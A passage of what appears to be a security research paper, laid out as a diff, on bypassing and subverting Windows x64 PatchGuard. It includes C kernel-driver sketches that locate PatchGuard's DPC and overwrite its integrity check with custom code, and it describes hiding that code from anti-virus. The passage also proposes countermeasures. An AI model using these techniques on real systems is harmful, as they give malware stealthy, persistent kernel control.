for a driver, as the interfaces for creating timers with associated DPCs +and DPC routines are documented and exported. Specifically, a third party +driver could queue a timer DPC, and then record address of the DPC dispatcher +routine via inspection of the return address of the timer DPC routine when it +is called. From there, the driver can derive the address of the call +instruction responsible for making the call to the DPC routine associated with +a DPC object that is associated with a timer. + +At this point, all a third party driver needs to do is patch the call +instruction in the DPC dispatcher to transfer execution control to the +driver's code. From there, the driver can filter all timer DPCs for the +PatchGuard DPC routine (perhaps by looking for a bogus kernel address in +DeferredContext, paired with a DPC routine that is within the confines of the +kernel image in-memory). 
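+
+A rough sketch of the first step (locating the timer DPC dispatcher by
+queuing a throwaway timer DPC and recording the return address observed
+inside the DPC routine) is shown below. The timer and DPC routines used here
+are standard, documented kernel exports; deriving the address of the actual
+call instruction from the recorded return address, and the subsequent patch,
+are left out because they require version-specific analysis.
+
+#include <ntddk.h>
+#include <intrin.h>
+
+#pragma intrinsic(_ReturnAddress)
+
+static KTIMER g_ProbeTimer;
+static KDPC   g_ProbeDpc;
+static PVOID  g_DpcDispatcherReturn;
+
+//
+// The DPC routine's only purpose is to record its return address, which lies
+// immediately after the call instruction in the kernel's timer DPC
+// dispatcher.
+//
+static VOID
+ProbeDpcRoutine(
+    PKDPC Dpc,
+    PVOID DeferredContext,
+    PVOID SystemArgument1,
+    PVOID SystemArgument2
+    )
+{
+    UNREFERENCED_PARAMETER(Dpc);
+    UNREFERENCED_PARAMETER(SystemArgument1);
+    UNREFERENCED_PARAMETER(SystemArgument2);
+
+    g_DpcDispatcherReturn = _ReturnAddress();
+
+    KeSetEvent((PKEVENT)DeferredContext, IO_NO_INCREMENT, FALSE);
+}
+
+PVOID
+LocateTimerDpcDispatcherReturn(
+    VOID
+    )
+{
+    KEVENT        Done;
+    LARGE_INTEGER DueTime;
+
+    KeInitializeEvent(&Done, NotificationEvent, FALSE);
+    KeInitializeTimer(&g_ProbeTimer);
+    KeInitializeDpc(&g_ProbeDpc, ProbeDpcRoutine, &Done);
+
+    DueTime.QuadPart = -10 * 1000 * 10; // 10ms, relative
+
+    KeSetTimer(&g_ProbeTimer, DueTime, &g_ProbeDpc);
+    KeWaitForSingleObject(&Done, Executive, KernelMode, FALSE, NULL);
+
+    return g_DpcDispatcherReturn;
+}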
+
+When the PatchGuard DPC is detected, the driver can decline to call the DPC
+routine and instead simply return control to the kernel DPC dispatcher
+immediately after the call instruction in the original instruction stream.
+This effectively prevents PatchGuard from ever running the system integrity
+check, which again gives the driver free rein to patch the kernel without
+fear of intervention by PatchGuard.
+
+In the author's opinion, the best way to prevent this approach is to use a
+multitude of different mechanisms to kick off execution of the PatchGuard
+check routine. For example, a dedicated thread waiting on a timer could also
+be used, or a frequently-called system routine could be modified to
+periodically make calls to PatchGuard. As long as calls to PatchGuard are
+funneled through one location, such as the timer DPC dispatcher, the entire
+PatchGuard integrity check system is at risk of being trivially bypassed in
+one fell swoop by third party drivers.
+
+4.7) Searching for the PatchGuard DPC
+
+PatchGuard currently uses a KTIMER object with an associated KDPC object,
+both allocated within non-paged pool memory, as a periodic trigger used to
+start PatchGuard's system integrity check routine. It should be possible to
+locate this timer object in memory and cancel it, preventing PatchGuard from
+executing.
+
+The implementation of this technique is essentially a classical egghunt style
+search through non-paged pool, with some specially defined restrictions as to
+how to find the target. Specifically, one is looking for a region of memory
+matching the following criteria:
+
+ 1. The memory is a valid KTIMER object. This means that the linked list
+ entries should be valid, and point to other seemingly valid KTIMER objects
+ (or the list head), and that the type field of the KTIMER is consistent with
+ a timer object.
+ 2. The timer should have a timer interval in the range of several minutes.
+ PatchGuard applies a randomized fuzz factor to the timer interval (within a
+ small range), but verifying that the interval of the timer is no more than
+ several minutes (say 7 or 8) should be an ample sanity check.
+ 3. The timer should have a KDPC associated with it (and the pointer should
+ be valid non-paged pool).
+ 4. The associated KDPC should have the appropriate type field.
+ 5. The associated KDPC should have a DPC routine that is within the confines
+ of the kernel image in-memory.
+ 6. The associated KDPC should have a DeferredContext value that is a
+ non-canonical kernel address.
+
+After the DPC is found, it can simply be canceled in order to disable
+PatchGuard. Approaches similar to those that could be used to counter
+technique 4.6 would be applicable here. Specifically, a diversity in the set
+of paths leading up to PatchGuard's execution would make a technique like
+this, which is targeted at one path (such as the timer DPC dispatcher), less
+effective at blocking PatchGuard.
+
+4.8) TLB Desynchronization (Split TLB)
+
+All x86 processors supporting protected mode and paging employ a caching
+scheme to speed up the translation of virtual addresses to physical
+addresses. This scheme is implemented via a set of Translation Lookaside
+Buffers, or TLBs, which cache the page attributes (and associated physical
+address) for a given virtual address. Recent x86 processors (Pentium II-class
+or later) utilize several sets of TLBs, such as one set of TLBs for data
+accesses and one set of TLBs for instruction accesses.
In normal system +operation, both TLBs (if a processor supports multiple TLBs) maintain +consistent views for the attributes of a particular page; however, it is +possible to deliberately desynchronize the contents of these TLBs, thereby +maintaining the illusion that a single page has different attributes depending +on whether it is referenced as data or as executable code. This deliberate +desynchronization of TLBs has many uses, from the implementation of no-execute +support (utilized by PaX/GRsec on GNU/Linux [6]) to ``memory cloaking'', a +technique often used by rootkits to provide one view of memory when memory is +referenced as data by a read operation, and a different view of memory if +memory is referenced by an instruction fetch. This same memory cloaking +technique that has appealed to rootkit developers for the purpose of hiding +rootkits from detection can also be used to hide kernel patching from +PatchGuard's integrity check. Strictly speaking, this proposed technique is +not a bypass mechanism for PatchGuard; rather, it is a mechanism to hide +kernel patching from PatchGuard, thus making PatchGuard harmless to third +parties that are patching the kernel. + +The details of this approach are essentially similar in many respects to that +of any program implementing a split-TLB approach to altering page attributes +or contents based on execute or read fetches. The exact details behind how +this can be accomplished are beyond the scope of this paper, and are discussed +elsewhere, by the PaX team (in the context of implementing no-execute on +legacy platforms) [6], and by Sherri Sparks and Jamie Butler (in the context of +implementing a Windows rootkit that utilizes split-TLBs to implement so-called +``memory cloaking'') [7]. Interested readers are encouraged to review these +references for the raw details on how the general split-TLB concept is +implemented. Although the referenced articles directly apply to x86, the +concepts apply in principle to x64 as well, and can likely be made to work on +x64 with minimal modification. + +After one has established a mechanism for desynchronizing TLBs (such as by +hooking the page fault handler), the recommended approach for this technique +is to desynchronize the TLBs for any regions in the kernel where one is +performing traditional opcode-replacement-based patching or hooking. +Specifically, when kernel code is read for execute on a page where an +opcode-replacement-based patch is in place, then the patched page should be +returned. If kernel code is read for a data reference (such as PatchGuard +making a read of kernel code to validate its integrity), then the original +data should be returned. This technique effectively hides all modifications +to kernel code to any access other than direct execution, which prevents +PatchGuard from detecting that kernel code has been altered by a third party. + +Note that in order for this approach to succeed, the hook on the page fault +handler itself must be hidden from PatchGuard. This cannot be directly +accomplished by the same TLB desynchronization tactic, as the page fault +handler must remain resident. 
+A combined approach, such as utilizing a debug breakpoint on the page fault
+handler (when coupled with a subverted debug trap handler, perhaps via
+PsInvertedFunctionTable as described previously in technique 4.3) along with
+a scheme to prevent PatchGuard from disabling debug-register-based
+breakpoints (such as described in technique 4.5), might be needed in order to
+hook the page fault handler in a manner truly transparent to PatchGuard.
+
+The most logical defense against this approach is to attempt to detect a
+compromise in the page fault dispatching path. Because TLB desynchronization
+cannot in general be used to hide the page fault handler itself (the page
+fault handler must remain marked present in memory), it would be difficult
+for a third party to conceal the alteration to the page fault handler from
+the kernel. This difficulty leaves only a limited number of ways in which
+alterations to the page fault handler could be hidden, such as by clever
+utilization of debug registers. As a result, the key to preventing this
+technique from remaining viable is to develop a way for PatchGuard to detect
+the page fault hook. If, for example, the debug trap handler and a debug
+breakpoint on the page fault handler were used to gain control on a page
+fault, then Microsoft might be able to prevent this technique by blocking or
+detecting the interception of the debug trap handler. One such approach might
+be to better secure PsInvertedFunctionTable, which represents an easy way for
+a third party to subvert the debug trap handler without PatchGuard's
+knowledge. Such counters will vary based on the mechanism used to hide the
+page fault handler hook, however.
+
+4.9) DPC Routine Patching
+
+As a variation on technique 4.2, a very simple-minded approach to disabling
+PatchGuard would be to simply hook every possible DPC routine, check whether
+the DPC is probably being called in order to execute PatchGuard's system
+integrity check, and if so, simply return from the DPC to the kernel timer
+DPC dispatcher. In order to implement this approach, one first needs to
+locate each possible DPC routine. Technique 4.2 lists a number of viable
+algorithms for fingerprinting (and locating) each DPC routine; any
+(preferably multiple) of the suggested algorithms in that technique would be
+directly applicable to this proposed approach.
+
+After one has identified all the possible DPC routines, all that is left is
+to patch each one to branch to driver-controlled code. From there, the driver
+could make the decision as to whether the DPC is being invoked legitimately,
+or whether it is being invoked as part of PatchGuard's system integrity check
+process (easily identified by a non-canonical kernel address being passed as
+DeferredContext). If the DPC is PatchGuard-related, then all the driver need
+do to block PatchGuard is to immediately return to the DPC dispatcher.
+
+This approach is fairly trivial to prevent (from Microsoft's point of view).
+Because it is signature-based, one possible counter-approach Microsoft could
+implement would be determining which signatures third party drivers use to
+detect PatchGuard DPCs, and altering the PatchGuard DPC routines to not match
+those signatures in the next PatchGuard version.
+Microsoft could also change the number of DPC routines to throw off drivers
+that assume PatchGuard will use exactly ten DPCs, or Microsoft could switch
+to an alternative delivery mechanism other than DPCs in order to prevent
+existing code that detects and hooks specific DPC routines from blocking
+PatchGuard.
+
+5) Subverting PatchGuard
+
+PatchGuard currently possesses a formidable array of defensive mechanisms
+that are aimed at making it difficult to reverse engineer and debug. Given
+that Microsoft does not currently have in place the infrastructure to make
+PatchGuard enforced by hardware, this is arguably the best that Microsoft
+will ever really be able to do in the short term: a system that is based on
+obfuscation and anti-debugging techniques in an attempt to make it difficult
+for third parties to detect, disable, or bypass it.
+
+There are other classes of software that seek to create defenses similar to
+those of PatchGuard. However, these other classes usually have far more
+nefarious purposes than preventing third parties from patching the kernel.
+Specifically, anti-debugging, anti-reverse-engineering, and self-decrypting
+code have often been used to hide viruses, rootkits, and other malicious
+software on compromised systems.
+
+Although Microsoft may have intended the defensive mechanisms employed by
+PatchGuard for an (arguably) good cause, these same anti-debugging,
+anti-detection, and anti-reverse-engineering techniques that protect
+PatchGuard from attack by third party drivers can also be subverted to
+protect custom code from detection or analysis by anti-virus or anti-rootkit
+software. In this respect, Microsoft has created a double-edged sword, as the
+same elaborate obfuscation and anti-debugging schemes that guard PatchGuard
+against third party software can also be used to guard malicious software
+from system security software. It is in fact quite possible to subvert
+PatchGuard version 2's myriad defenses to execute custom code instead of
+PatchGuard's system integrity check routine. While doing so might not exactly
+be called trivial, it is far from impossible.
+
+In order to subvert PatchGuard to do one's bidding, one must first catch
+PatchGuard in the act, so to speak. To accomplish this, the author recommends
+turning to one of the proposed bypass techniques as a starting place. For
+example, consider the first proposed bypass technique, wherein the author
+recommends hooking _C_specific_handler to intercept control of execution at
+the exception generated by the PatchGuard DPC routine in order to trigger
+execution of the system integrity check. An implementation of this bypass
+technique provides direct access to the machine context inside the PatchGuard
+DPC routine, and this machine context contains the information necessary to
+locate the PatchGuard system integrity check routine.
+
+Since the objective is to repurpose the system integrity check routine to
+execute custom code, this is a good starting point. However, determining the
+location of the system integrity check routine is much more involved than
+simply skipping over PatchGuard's checks entirely; the pointer to the routine
+in question is encrypted based on the original arguments to the DPC (the Dpc
+and DeferredContext arguments). Additionally, the original arguments to the
+PatchGuard DPC have at this point already been moved from registers to the
+stack and obfuscated (rotated left or right by a magical constant).
+As the original contents of the argument registers are deliberately
+overwritten by the DPC routine before the access violation is triggered,
+there is no choice other than to somehow fish the DPC arguments out of the
+caller's stack. This is actually somewhat of a challenge, given that such an
+approach must work for all kernel versions, and must also work for all of the
+different DPC permutations. Since this set of possibilities represents an
+unmaintainably large number of routines to reverse engineer in order to
+determine rotate obfuscation values and stack offsets, a more generalized
+approach to locating the original arguments on the stack must be taken. In
+order to create such a generic approach, one must take a closer look at the
+first few instructions of each DPC routine (leading up to the intentional
+access violation). Although PatchGuard has put into place several barriers to
+prevent easy retrieval of the original arguments from this context, there
+might be a pattern or weakness that could be exploited in order to recover
+the arguments in question.
+
+The basic things common to each DPC routine, when it comes to the machine
+context at the time of the access violation, are:
+
+ 1. The original arguments have been stored on the stack in an obfuscated
+ form (rotated left or right by an arbitrary magical constant).
+
+ 2. The access violation always occurs by dereferencing rax. Here, rax is
+ always the deobfuscated form of the DeferredContext argument. This gives us
+ one of the arguments for free, as rax in the register context at the time of
+ the access violation is always the plaintext DeferredContext value.
+
+ 3. The stack location where the Dpc argument is stored varies greatly from
+ DPC version to DPC version. Furthermore, it also varies between different
+ kernel flavors within an operating system family, and between operating
+ system families. As a result, it is not practical to hardcode stack
+ displacements for this argument.
+
+ 4. The instruction immediately prior to the faulting instruction is always
+ an instruction in the form of ror rax, <constant>. Here, the magical
+ constant is an immediate value, which means that it is encoded as a part of
+ the opcode for this instruction itself. Each DPC has its own unique magical
+ constant, and the magical constants used do not change for a particular DPC
+ flavor across all kernel flavors and operating system families. This gives
+ us a nice way to quickly identify which of the ten PatchGuard DPCs is in use
+ from the context of the _C_specific_handler hook, without having to do ugly
+ code fingerprinting or analysis (a sketch of this identification step
+ follows the list below). Unfortunately, we still don't have a way to
+ determine the stack displacement of the Dpc argument.
+
+ 5. The r8 register is always equal to the original Dpc argument, shifted
+ right by the low byte of the DeferredContext argument. Although this may
+ seem tantalizingly close to what we're looking for, it can't actually be
+ used as a substitute for the original Dpc argument, even though the
+ DeferredContext argument is known here (due to the value of rax). This is
+ because the right shift operation is destructive, in that information is
+ permanently lost as bits are shifted right off of the register into
+ oblivion. As a result, depending on the low byte of the DeferredContext
+ argument, important bits in the Dpc argument have already been permanently
+ lost in the pseudo-copy residing in r8.
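+
+A minimal sketch of this identification step, as it might look inside a
+_C_specific_handler hook, is shown below. The assumption that the ror
+instruction is encoded as 48 C1 C8 imm8 and sits exactly four bytes before
+the faulting instruction is an illustration derived from the observations
+above; it should be verified against the target kernel rather than taken as a
+given.
+
+#include <ntddk.h>
+
+#ifndef STATUS_ACCESS_VIOLATION
+#define STATUS_ACCESS_VIOLATION ((NTSTATUS)0xC0000005L)
+#endif
+
+//
+// Hypothetical helper invoked from a _C_specific_handler hook with the
+// exception and context records describing PatchGuard's intentional access
+// violation.
+//
+BOOLEAN
+IdentifyPatchGuardDpc(
+    PEXCEPTION_RECORD ExceptionRecord,
+    PCONTEXT          ContextRecord,
+    PUCHAR            RotateConstant,  // receives the per-DPC magical constant
+    PULONG64          DeferredContext  // receives the plaintext DeferredContext
+    )
+{
+    PUCHAR Ror;
+
+    if (ExceptionRecord->ExceptionCode != STATUS_ACCESS_VIOLATION)
+        return FALSE;
+
+    //
+    // "ror rax, imm8" (assumed encoding 48 C1 C8 ib) is expected to
+    // immediately precede the faulting dereference of rax; its immediate
+    // operand identifies which of the ten DPC flavors is in use.
+    //
+    Ror = (PUCHAR)ExceptionRecord->ExceptionAddress - 4;
+
+    if (Ror[0] != 0x48 || Ror[1] != 0xC1 || Ror[2] != 0xC8)
+        return FALSE;
+
+    *RotateConstant  = Ror[3];
+    *DeferredContext = ContextRecord->Rax; // rax holds the deobfuscated value
+
+    return TRUE;
+}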
+
+Although the situation may initially appear grim, it is in fact still
+possible to locate the Dpc argument given the above information; all that is
+needed is a bit of work (and getting one's hands dirty with some ugly
+tricks). Specifically, it is possible to search the stack frame of the DPC
+routine for the Dpc argument with a brute-force attack. This isn't exactly
+elegant, but it gets the job done. There are a number of hints that can be
+used to increase the chance of successfully finding the real Dpc argument on
+the stack (a sketch that combines them follows the list):
+
+ 1. The stack is 8-byte aligned (at least) due to x64 calling convention
+ requirements, and the Microsoft C/C++ compiler will always place
+ pointer-sized values on the stack in 8-byte-aligned locations. As a result,
+ the search can be narrowed down to 8-byte-aligned locations on the stack,
+ instead of a bytewise search.
+
+ 2. Because the identity of the current DPC routine is known (due to
+ analyzing the ror instruction immediately preceding the faulting mov eax,
+ [rax] instruction), the rotate constant used to obfuscate the Dpc argument
+ is known. Each DPC routine has its own unique magical rotate constant, and
+ as the current DPC routine has been positively identified, the rotate
+ constant used to obfuscate the Dpc argument on the stack is thus also known.
+
+ 3. A quick check as to whether a value on the stack could possibly be the
+ Dpc argument can be made by rotating the value on the stack by the known
+ obfuscation constant, then shifting the value right by the low byte of the
+ DeferredContext argument and comparing the result to the r8 value at the
+ time of the exception. If there is a mismatch, then the current stack
+ location can be eliminated from the search. This does not provide a positive
+ match, but it does provide a way to positively eliminate possibilities. This
+ step is also optional, in that it is still possible to locate the Dpc
+ argument without relying on r8; the check against r8 is simply an
+ optimization.
+
+ 4. The Dpc argument should point to a valid non-paged pool address, given
+ that it must represent a valid kernel pointer. In order to check that this
+ is the case, MmIsAddressValid can be used to test whether the deobfuscated
+ value in question is a valid pointer or not. (Yes, MmIsAddressValid is a bit
+ of a race condition and certainly a hack. The author would like to note that
+ this approach was described as requiring that the implementor get his or her
+ ``hands dirty with some ugly tricks'', in an attempt to forestall the
+ inevitable complaints about how this approach might be decried as an
+ unstomachably ugly hack by some.)
+
+ 5. The Dpc argument should point to a valid non-paged pool address whose
+ length is great enough to contain a KDPC object, plus at least one
+ pointer-sized additional field. A secondary MmIsAddressValid test can be
+ used to verify that the pointer describes a valid region large enough to
+ contain the KDPC object, plus the additional pointer-sized field following
+ it (the PatchGuard decryption key).
+
+ 6. The Dpc argument should point to a DPC whose Type and DeferredContext
+ fields have been zeroed. (The DPC routine deliberately zeros these values in
+ the DPC before intentionally triggering an access violation.) If the
+ suspected Dpc argument, when treated as a PKDPC, does not have these
+ properties, then it can be eliminated as a possibility.
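+
+A minimal sketch that combines the hints above might look like the following.
+The use of _rotr64 (the rotate direction varies per DPC flavor), the
+MmIsAddressValid checks, and the KDPC field tests mirror the discussion in
+this paper, but the exact constants and offsets should be treated as
+assumptions to validate rather than facts.
+
+#include <ntddk.h>
+#include <intrin.h>
+
+//
+// Brute-force search of the DPC routine's stack frame for the obfuscated Dpc
+// argument. Rsp, R8 and DeferredContext are taken from the machine context
+// at the time of the access violation; RotateConstant is the per-DPC magical
+// constant recovered from the ror instruction.
+//
+ULONG64
+FindDpcArgumentOnStack(
+    ULONG64 Rsp,
+    ULONG64 R8,
+    ULONG64 DeferredContext,
+    UCHAR   RotateConstant
+    )
+{
+    ULONG64 Slot;
+
+    for (Slot = Rsp; Slot < Rsp + 256; Slot += sizeof(ULONG64))
+    {
+        ULONG64 Dpc;
+
+        if (!MmIsAddressValid((PVOID)Slot))
+            continue;
+
+        //
+        // Undo the per-DPC rotate obfuscation (some flavors may require
+        // _rotl64 instead).
+        //
+        Dpc = _rotr64(*(PULONG64)Slot, RotateConstant);
+
+        //
+        // Optional elimination check against r8: the Dpc argument shifted
+        // right by the low byte of DeferredContext (the processor masks the
+        // shift count to six bits).
+        //
+        if ((Dpc >> (DeferredContext & 0x3F)) != R8)
+            continue;
+
+        //
+        // The candidate must point to a valid KDPC plus one pointer-sized
+        // trailing field (the PatchGuard decryption key).
+        //
+        if (!MmIsAddressValid((PVOID)Dpc) ||
+            !MmIsAddressValid((PVOID)(Dpc + sizeof(KDPC) + sizeof(ULONG64) - 1)))
+            continue;
+
+        //
+        // PatchGuard zeroes the Type and DeferredContext fields of the DPC
+        // before triggering the access violation.
+        //
+        if (((PKDPC)Dpc)->Type != 0 || ((PKDPC)Dpc)->DeferredContext != NULL)
+            continue;
+
+        return Dpc;
+    }
+
+    return 0;
+}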
+
+By repeatedly applying these rules to every applicable location within a
+reasonable distance upward from the rsp value at the time of the exception
+(say, 256 bytes, although the exact size can be greater; the only requirement
+is that the entire local variable space of the DPC routine with the largest
+local variable space is completely contained within the search region), it is
+possible to recover the Dpc argument with virtual certainty. In the author's
+experience, this technique works quite reliably, despite the fact that one
+might intuit that a search of an unknown stack frame would be prone to
+failing or turning up false positives.
+
+After both the Dpc and DeferredContext arguments to the PatchGuard DPC
+routine have been recovered, it is a simple matter of analyzing how
+PatchGuard invokes the system integrity check in order to determine how to
+locate it in-memory. This has been discussed previously, and it amounts to
+the following set of statements:
+
+ULONG64 DecryptionKey, PatchGuardCheckFunction;
+
+DecryptionKey = *(PULONG64)(Dpc + 0x40);
+PatchGuardCheckFunction = DecryptionKey ^ DeferredContext;
+PatchGuardCheckFunction |= 0xFFFFF80000000000;
+
+At this point, it's almost possible to replace the system integrity check
+routine with custom code. However, there is still the matter of the pesky
+self-decrypting stub that runs before the check function. Because the DPC
+routine's exception handler rewrites the first instruction of the stub before
+it is executed, one doesn't have a whole lot of choice but to implement at
+least a very basic version of the decryption stub for the system integrity
+check routine.
+
+Recall that the first instruction in the stub is set to the following:
+
+lock xor qword ptr [rcx],rdx
+
+Looking at the prototype for the decryption stub, rcx corresponds to the
+address of the decryption stub itself, and rdx corresponds to the decryption
+key. Since this instruction modifies both itself and the next instruction
+(the instruction is four bytes long and the xor alters eight bytes), the
+replacement code for the system integrity check routine must allow the first
+instruction to be the above xor instruction, and must allow for the second
+instruction (at a minimum) to be initially xor-obfuscated. For simplicity's
+sake, the author has chosen to implement the simplest possible solution to
+this conundrum, which is to make the second instruction in the replacement
+code a duplicate of the first instruction. In other words, the replacement
+code would read as follows:
+
+;
+; This instruction is forced on us by PatchGuard,
+; and cannot be altered; it is rewritten at runtime.
+;
+
+lock xor qword ptr [rcx],rdx
+
+;
+; The next instruction, conveniently four bytes
+; long, re-encrypts the first eight bytes of the
+; decryption stub (which include the second
+; instruction itself) by xoring them with the
+; decryption key a second time.
+;
+
+lock xor qword ptr [rcx],rdx
+
+;
+; (... any custom code may follow here ...)
+;
+
+As noted previously, after specially constructing the replacement code, it is
+necessary to initially encrypt the second instruction (as it will be
+immediately decrypted by the first instruction). This must be done before
+control is returned to PatchGuard.
+
+After the custom code is configured and the second instruction is encrypted,
+all that remains is to copy the custom code over the PatchGuard decryption
+stub.
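+
+One plausible way to carry out these final steps (building the replacement
+block, pre-encrypting it, and copying it over the decryption stub) is
+sketched below. The fixed-size buffer, the placement of the custom code at
+offset 8, and the decision to xor the entire first qword (harmless, since the
+first instruction is rewritten by the exception handler at runtime anyway)
+are illustrative assumptions rather than requirements.
+
+#include <ntddk.h>
+
+VOID
+InstallReplacementStub(
+    PUCHAR  PatchGuardCheckFunction, // decrypted pointer derived above
+    ULONG64 DecryptionKey,           // *(PULONG64)(Dpc + 0x40)
+    PUCHAR  CustomCode,
+    SIZE_T  CustomCodeSize
+    )
+{
+    static const UCHAR LockXorRcxRdx[] = { 0xF0, 0x48, 0x31, 0x11 };
+    UCHAR Replacement[128];
+
+    ASSERT(CustomCodeSize <= sizeof(Replacement) - 8);
+
+    //
+    // Two copies of "lock xor qword ptr [rcx], rdx": the first is rewritten
+    // by the DPC's exception handler at runtime, the second re-encrypts the
+    // first qword once the stub begins executing.
+    //
+    RtlCopyMemory(&Replacement[0], LockXorRcxRdx, sizeof(LockXorRcxRdx));
+    RtlCopyMemory(&Replacement[4], LockXorRcxRdx, sizeof(LockXorRcxRdx));
+    RtlCopyMemory(&Replacement[8], CustomCode, CustomCodeSize);
+
+    //
+    // Pre-encrypt the first qword so that the first instruction's xor yields
+    // the plaintext second instruction; mangling bytes 0-3 here is harmless
+    // because they are rewritten before they are ever executed.
+    //
+    *(PULONG64)Replacement ^= DecryptionKey;
+
+    RtlCopyMemory(PatchGuardCheckFunction, Replacement, 8 + CustomCodeSize);
+}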
+
+When this is accomplished, the PatchGuard DPC's exception handler will invoke
+the supplied custom code instead of the system integrity check routine.
+
+However, this is not really all that interesting due to the fact that
+PatchGuard utilizes a one-shot timer. The custom code that was substituted
+for the decryption stub will never be run again. To account for this fact, it
+would be prudent to place a call to queue a timer with an associated DPC
+routine (pointing to the DPC routine that PatchGuard selected at boot) within
+the custom code block.
+
+At this point, it is possible to simply allow the normal exception
+dispatching process to continue (i.e. to resume _C_specific_handler), after
+which the custom code will be invoked instead of PatchGuard. In essence,
+PatchGuard has been not only disabled, but completely subverted to call
+customized code under the control of a third party driver instead of the
+system integrity check.
+
+Still, the situation is less than optimal. Presently, there is still a hook
+in _C_specific_handler that is there for anyone to see (and recognize that
+someone has tampered with the kernel). Additionally, the driver that was used
+to subvert PatchGuard in the first place is still loaded, which may also be a
+tell-tale sign that someone may have done something unsavory to the kernel.
+
+These problems are also solvable, however. It turns out that after PatchGuard
+has been subverted, it is safe to unhook from _C_specific_handler, and then
+simply call back into _C_specific_handler after the hook is removed.
+Furthermore, everything necessary to run the subverted system integrity check
+routine could even reside within PatchGuard's own internal data structures;
+for example, one could simply utilize the extra space after the custom code,
+where the decryption stub and PatchGuard check routine would normally reside,
+as a parameter block. This is especially convenient, as the custom code block
+is given a pointer to itself in rcx (the first argument), and it is easy to
+add a known constant value to that pointer in order to retrieve the parameter
+block for the custom code. At this point, all of the code and data necessary
+for the custom code that the driver has subverted PatchGuard with is located
+in dynamically allocated memory. Given this, the original driver is no longer
+needed and can even be unloaded (so as to further disguise the fact that any
+alterations to the kernel have taken place). After the driver has been
+unloaded, the only traces of the alterations that have taken place would be
+the unloaded module list (easily modified) and the re-written PatchGuard
+system integrity routine itself (which could easily be bolstered to be
+self-decrypting, with a differing encryption key, in order to make for an
+extremely difficult-to-locate target in-memory).
+
+The end result is that PatchGuard has been disabled, and in its place,
+arbitrary custom code is periodically executed. Furthermore, no modifications
+or patches to kernel code or global data are present, and no suspicious
+drivers (or even suspicious extraneous memory allocations) remain present in
+memory. In essence, the traces of the fact that PatchGuard has been subverted
+would be visible only to someone (or something) that knows how to locate and
+disable PatchGuard.
+
+The supplied example program for subverting PatchGuard is fairly simple, and
+it does not utilize all of the defensive technologies employed by PatchGuard.
+For instance, it does not change the decryption key on every execution, nor +does it follow through with keeping the entire code block encrypted except +just before execution. These features could be easily added, however, and +would greatly increase the difficulty of locating the subverted PatchGuard +code in memory. + +6) Future Direction of PatchGuard and ``Anti-Hack'' Systems + +In the future, there are a couple of generalized approaches that Microsoft +could take to significantly strengthen PatchGuard against attack. +Specifically, these involve adding redundancy and removing single points of +failure from PatchGuard. It is often helpful to look at an anti-hack system +like PatchGuard as a critical system that one would like to keep running at +all times with minimal downtime (i.e. a network or service with +high-availability). The logical way to accomplish that goal is to locate and +eliminate single points of failure, such as by adding redundancy. In a high +availability network, one would accomplish this by adding redundant cables, +switches, and the like, such that if one component were to fail, the system as +a whole would continue to operate instead of failing entirely. With an +anti-hack system such as PatchGuard, it is helpful to add redundancy to all +critical code paths such that there is no single point where an attacker can +simply change an opcode or hook in with the end result of disabling the entire +anti-hack system. + +Removing these single points of failure is critical to the longevity of an +anti-hack system. The main concept to grasp in such cases is that the +attacker will always try to seek out the easiest way to break the defenses of +the target system. All the obfuscation and encryption in the world does +little good if an attacker can simply change a jmp to a nop and prevent +elaborate encryption and anti-debugging facilities from ever getting the +chance to run. In this respect, PatchGuard is flawed in its current +implementation. There are many different single points of failure where an +attacker could inject themself at a single place and completely disrupt +PatchGuard. + +One possible solution to this problem might be to ensure that there are +multiple different code paths that can lead to every point in the PatchGuard +system integrity check. The nature of the battle between anti-hack systems +and attackers relates to how easy it is to bypass the weakest link in the +anti-hack system. Until all of the weak links in the system are shored up +simultaneously, the system remains much more vulnerable to easy attack or +bypass. With this respect, PatchGuard version 2 does little to improve on the +weakest links of the system and as such there are still a vast number of ways +to bypass it. Even worse, each bypass technique is often only required to +attack one specific aspect of PatchGuard in order to disable it as a whole. + +As far as PatchGuard itself is concerned, one approach that Microsoft could +take to significantly increase the resiliency and robustness of the system to +outside interference would be to merge some sort of critical system +functionality with the PatchGuard system integrity check. Such an approach +would make it difficult for a would-be attacker to simply bypass a call to +PatchGuard, as doing so would also bypass some sort of critical system +functionality that would (ideally) be required for the system to operate in +any usable capacity. 
At this point, the challenge for attackers then turns +into either replicating the critical system functionality that is contained +within PatchGuard, finding a way to split the critical system functionality +away from the system integrity check portions of PatchGuard, or finding a way +to evade PatchGuard's detection of kernel patching entirely. Microsoft can +make the first two points arbitrarily difficult, especially since the +knowledge of Windows internals is presumably greater inside Microsoft than +outside Microsoft. The incorporation of critical system functionality would be +theoretically easier for Microsoft to do than it would be for would-be +attackers to reliably reverse engineer and re-implement such functionality on +their own, forcing would-be attackers to take the hard route of trying to +separate PatchGuard from critical system functionality. This is where clever +use of obfuscation and anti-debug techniques would really see maximum +effectiveness, as an attacker would (optimally) have no choice other than to +step through and understand PatchGuard entirely before being able to replicate +the critical functionality contained within PatchGuard (or selectively +activate the critical functionality without activating the system integrity +check). + +The latter problem (evading PatchGuard detection entirely) is likely to be a +much more difficult one to tackle, however. Techniques such as the clever use +of debug registers, TLB desynchronization, and other related attacks are +extremely difficult to detect (and typically very easy to alter to avoid +detection after a known detection scheme for such attacks is developed). In +this particular respect, Microsoft is presently at a great disadvantage. +Improving PatchGuard to avoid such evasion tactics is likely to prove both +difficult and a poor investment of time relative to how quickly attackers can +adapt and compensate for Microsoft's efforts at bolstering PatchGuard's +capabilities. + +Looking towards the future, it can be expected that PatchGuard will ultimately +see the obfuscation-based defensive mechanisms currently in place substituted +with hardware-based defensive mechanisms. In particular, the author expects +that Microsoft will eventually deploy a PatchGuard version that is augmented +by the hardware-based virtualization (also known as hypervisor) support +present in recent processors (and being developed for Windows Server +``Longhorn'', code-named ``Viridian''). An implementation of PatchGuard that +is guarded by a hypervisor would be immune to being simply patched out of +existence (which eliminates some of the most significant flaws in current +versions of PatchGuard), at least as long as the hypervisor itself remains +secure and free from exploitable bugs. In a hypervisor-based system with +PatchGuard, third party drivers would not be permitted to execute with +hypervisor privileges, thus completely preventing runtime patching of +PatchGuard itself (which would be a part of the privileged hypervisor layer). +A hypervisor-based system might also be able to implement concepts such as +write-once memory that could be adapted to prevent the kernel from being +patched in the first place once it is initially loaded into memory (as opposed +to detecting patching after the fact, and bringing down the system in response +to third party drivers performing underhanded deeds). 
+
+Even with hypervisor support in place, however, it is anticipated that there
+will still be ways for third parties to alter the behavior of the kernel in
+ways not completely authorized by Microsoft. For instance, as long as support
+for debug registers must be retained in order for the kernel debugger to
